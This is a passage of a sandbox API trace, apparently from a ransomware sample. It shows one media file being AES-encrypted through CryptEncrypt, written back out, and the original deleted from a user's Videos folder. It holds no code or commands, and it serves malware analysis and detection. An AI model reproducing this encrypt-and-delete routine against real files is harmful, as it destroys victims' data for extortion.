hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0102.804] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0102.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0102.804] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e29b0, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e29b0*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0102.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.806] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0103.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0103.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0103.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0103.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0103.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0103.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.059] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.059] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0103.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0103.060] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0103.060] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.060] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0103.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.060] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0xc29d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0xc2a0) returned 1 [0103.060] CharLowerBuffW (in: lpsz="byte[49825]", cchLength=0xb | out: lpsz="byte[49825]") returned 0xb [0103.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.061] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453a808*, pdwDataLen=0x144e088*=0xc29d, dwBufLen=0xc2a0 | out: pbData=0x453a808*, pdwDataLen=0x144e088*=0xc2a0) returned 1 [0103.061] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.061] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0103.061] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.061] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xc2a0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0xc2a0, lpOverlapped=0x0) returned 1 [0103.063] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0103.063] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cacb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0103.063] CryptDestroyKey (hKey=0x41ac280) returned 1 [0103.063] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.063] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0103.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.064] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0103.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.064] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0103.064] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0103.064] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0103.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.064] FreeLibrary (hLibModule=0x756e0000) returned 1 [0103.064] CloseHandle (hObject=0x298) returned 1 [0103.064] CloseHandle (hObject=0x258) returned 1 [0103.066] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\yxs3r3.mp4", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\yxs3r3.mp4", lpFilePart=0x0) returned 0x4c [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a88c8 [0103.067] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\yxs3r3.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\yxs3r3.mp4")) returned 0x20 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a86d0 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0103.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0103.067] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\yxs3r3.mp4", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2281a0f0, ftCreationTime.dwHighDateTime=0x1d5e63a, ftLastAccessTime.dwLowDateTime=0x46c92e10, ftLastAccessTime.dwHighDateTime=0x1d5f0ee, ftLastWriteTime.dwLowDateTime=0x46c92e10, ftLastWriteTime.dwHighDateTime=0x1d5f0ee, nFileSizeHigh=0x0, nFileSizeLow=0xc29d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="yxs3r3.mp4", cAlternateFileName="")) returned 0x41ac500 [0103.067] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\yxs3r3.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\yxs3r3.mp4")) returned 1 [0103.111] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2281a0f0, ftCreationTime.dwHighDateTime=0x1d5e63a, ftLastAccessTime.dwLowDateTime=0x46c92e10, ftLastAccessTime.dwHighDateTime=0x1d5f0ee, ftLastWriteTime.dwLowDateTime=0x46c92e10, ftLastWriteTime.dwHighDateTime=0x1d5f0ee, nFileSizeHigh=0x0, nFileSizeLow=0xc29d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="yxs3r3.mp4", cAlternateFileName="")) returned 0 [0103.111] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0103.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0103.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.111] HeapFree (in: 